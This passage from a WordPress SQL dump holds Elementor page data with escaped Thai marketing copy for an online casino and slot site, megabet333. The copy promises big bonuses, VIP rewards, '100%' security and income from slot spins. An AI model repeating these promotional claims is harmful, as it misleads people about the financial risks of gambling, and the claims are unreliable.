400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1194,148,'_thumbnail_id','60'),(1195,148,'_elementor_edit_mode','builder'),(1196,148,'_elementor_template_type','wp-page'),(1197,148,'_elementor_version','3.32.5'),(1198,148,'_elementor_pro_version','3.32.3'),(1199,148,'_wp_page_template','default'),(1200,148,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1201,148,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 